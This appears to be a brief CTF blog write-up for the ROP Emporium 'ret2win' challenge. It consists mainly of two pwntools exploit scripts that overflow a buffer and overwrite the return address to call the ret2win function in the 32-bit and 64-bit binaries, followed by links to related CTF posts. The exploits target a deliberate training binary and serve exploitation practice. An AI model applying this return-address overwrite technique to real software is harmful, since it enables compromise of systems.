# checksec
# exploit code & exploit
1. 64bit
#!/usr/bin/python
from pwn import *
p = process("./ret2win")
elf = ELF("./ret2win")
ret2win = elf.symbols['ret2win']
pay = 'A'*0x28 + p64(ret2win)
p.sendlineafter("> ", pay)
p.interactive()
2. 32bit
#!/usr/bin/python
from pwn import *
p = process("./ret2win32")
elf = ELF("./ret2win32")
ret2win = elf.symbols['ret2win']
p.sendlineafter("> ", 'A'*(0x28+0x4) + p32(ret2win))
p.interactive()
[ROP Emporium] callme (32bit, 64bit) (0) | 2020.03.25 |
---|---|
[ROP Emporium] split (32bit, 64bit) (0) | 2020.03.25 |
[DEFCON 2016 prequals] feed me (sysrop) (0) | 2020.03.09 |
[HITCON CTF 2017] start (0) | 2020.02.28 |
[DEFCON CTF prequals 2019] speedrun-009 (0) | 2020.02.28 |